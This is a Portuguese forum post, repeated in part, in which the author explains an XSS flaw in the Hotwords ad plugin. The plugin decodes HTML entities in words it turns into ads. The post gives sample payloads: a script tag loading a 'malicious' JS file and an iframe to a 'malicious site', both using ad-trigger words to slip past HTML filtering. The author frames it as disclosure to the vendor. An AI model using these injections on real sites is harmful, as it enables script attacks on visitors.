Olá amigos,
A muito tempo eu fiz essa matéria: Falha em HOTWORDS (XSS em Forums)
mas muita gente não entendeu como funcionava então irei exemplificar melhor agora.
O Hotwords:
O Hotwords é um plugin para monetização de sites, onde palavras de texto viram balões de anuncios.
Nós usamos ele no site e possívelmente você deve estar vendo agora.
Explorando:
Após um tempo descobri que o código usado no java da empresa permite explorarmos XSS em sites, comentários, fóruns, etc.
Como Samukt? Por exemplo o caractere “<” em html é “<” , o código da Hotwords converteria o “<” que exibe “<” em html virando realmente um “<” no código fonte.
EX:
Para exibirmos o seguinte texto: ” <img src=”imagem.png”> ” no código fonte escrevemos ” <img src=”imagem.png”> “, usando esta técnica ele converteria o ” <” e “> ” para “<” e “>” retornando algo como:
O interessante é que ele só é vulnerável quando uma palavra irá virar um anúncio, então teremos que chutar palavras que normalmente virariam anúncios.
A estrutura:
Digamos que o site bloquei html,
o resultado de algo postado nessa linguagem retornaria ” <” e “> ” como já dito antes,
mas se postarmos <img src=”imagem.png” alt=” Palavras que podem virar anuncios ” > a palavra que virar tag irá transformar ” <” e “> ” em “<” e “>” validando a imagem ou outro código html.
Isso é inofensivo Samukt…
Pois é né, parece mas se você injetar outro tipo de código pode ser bastante malicioso como por exemplo:
<script src=”java_maliciosa.js” type=”text/javascript” alt=”compras carro internet arquivo etc”></script>
<iframe src=”site_malicioso.com.br” alt=”compras carro internet arquivo etc”></iframe>
Entre outros…
Imagens:
Thanks,
Samukt
A muito tempo eu fiz essa matéria: Falha em HOTWORDS (XSS em Forums)
mas muita gente não entendeu como funcionava então irei exemplificar melhor agora.
O Hotwords:
O Hotwords é um plugin para monetização de sites, onde palavras de texto viram balões de anuncios.
Nós usamos ele no site e possívelmente você deve estar vendo agora.
Explorando:
Após um tempo descobri que o código usado no java da empresa permite explorarmos XSS em sites, comentários, fóruns, etc.
Como Samukt? Por exemplo o caractere “<” em html é “<” , o código da Hotwords converteria o “<” que exibe “<” em html virando realmente um “<” no código fonte.
EX:
Para exibirmos o seguinte texto: ” <img src=”imagem.png”> ” no código fonte escrevemos ” <img src=”imagem.png”> “, usando esta técnica ele converteria o ” <” e “> ” para “<” e “>” retornando algo como:
O interessante é que ele só é vulnerável quando uma palavra irá virar um anúncio, então teremos que chutar palavras que normalmente virariam anúncios.
A estrutura:
Código PHP:
<div id="HOTWordsTxt" name="HOTWordsTxt">Aqui vem o texto que será exibido {{Comentário irá aqui}}</div> <script src='http://adsXXXX.hotwords.com.br/show.jsp?id=SUAIDHOTWORDS'></script>[LEFT][/LEFT]
Digamos que o site bloquei html,
o resultado de algo postado nessa linguagem retornaria ” <” e “> ” como já dito antes,
mas se postarmos <img src=”imagem.png” alt=” Palavras que podem virar anuncios ” > a palavra que virar tag irá transformar ” <” e “> ” em “<” e “>” validando a imagem ou outro código html.
Pois é né, parece mas se você injetar outro tipo de código pode ser bastante malicioso como por exemplo:
<script src=”java_maliciosa.js” type=”text/javascript” alt=”compras carro internet arquivo etc”></script>
<iframe src=”site_malicioso.com.br” alt=”compras carro internet arquivo etc”></iframe>
Entre outros…
Imagens:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Live Demo:
Você pode testar a vulnerabilidade Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Agradecimentos:
Gostaria de agradecer a todos que leram esse tutorial e também ao pessoal do Guia do Hacker que me deram apoio e onde consegui descobrir a vulnerabilidade.
Estarei enviando outro email para o pessoal da Hotwords para concertarem ela.
Você pode testar a vulnerabilidade Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Agradecimentos:
Gostaria de agradecer a todos que leram esse tutorial e também ao pessoal do Guia do Hacker que me deram apoio e onde consegui descobrir a vulnerabilidade.
Estarei enviando outro email para o pessoal da Hotwords para concertarem ela.
PS: Queria pedir desculpas a administração do GH por postar essa vulnerabilidade aqui, porem acho que ao invéz de escode-la deveriamos reclamar para a Hotwords, meu site também usa o plugin deles.
Sugiro a vocês mandarem um email a eles, assim como eu.
Sugiro a vocês mandarem um email a eles, assim como eu.
Samukt
Comment